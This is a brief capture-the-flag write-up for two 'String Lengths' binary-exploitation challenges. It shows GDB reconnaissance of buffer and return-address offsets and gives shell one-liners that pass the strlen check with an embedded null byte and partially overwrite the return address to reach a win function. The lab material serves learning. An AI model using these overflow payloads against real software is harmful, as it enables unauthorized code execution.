String Lengths

String Lengths (easy)

1. GDB -> disas win_authed -> the address of instruction after auth check is 0x211f
2. As told in the debug output, the return address from challenge() is stored at 72 bytes from start of input buffer

3. Observing from source code, length computed by strlen() on input must be < 28

   shell echo -n -e "aaa\x00aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa\x1f\x21" | /challenge/binary-exploitation-null-write-w

we need to write two bytes, then one of those nibbles (the fourth least-significant one) will be a guess, and it will be incorrect 15 of 16 times. This is okay: we can just run our exploit a few times until it works (statistically, ~50% chance after 11 times and ~90% chance after 36 times)

String Lengths (hard)

1. In gdb, disas win_authed, disas main, disas challenge, we get to know:

   • Instruction after auth check is at 0x1797
   • challenge() returns at 0x1ace
   • return value of strlen() must be <= 0x70 = 112

2. Set a breakpoint b *challenge+413, run and give a short string of a's as input

3. info frame -> rbp is at 0x7ffcc677a8f0
4. x/100xg $rbp-200:
   • input buffer starts at 0x7ffcc677a850, which is rbp-0xa0 = rbp-160
   • return address is stored at 0x7ffcc677a8f8, which is rbp+0x8 = rbp+8

5. 168 a's followed by desired two bytes (one of the 4 nibbles is a guess, so have to run the exploit a few times):

   shell echo -n -e "aaaaa\x00aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa\x97\x17" | /challenge/binary-exploitation-null-write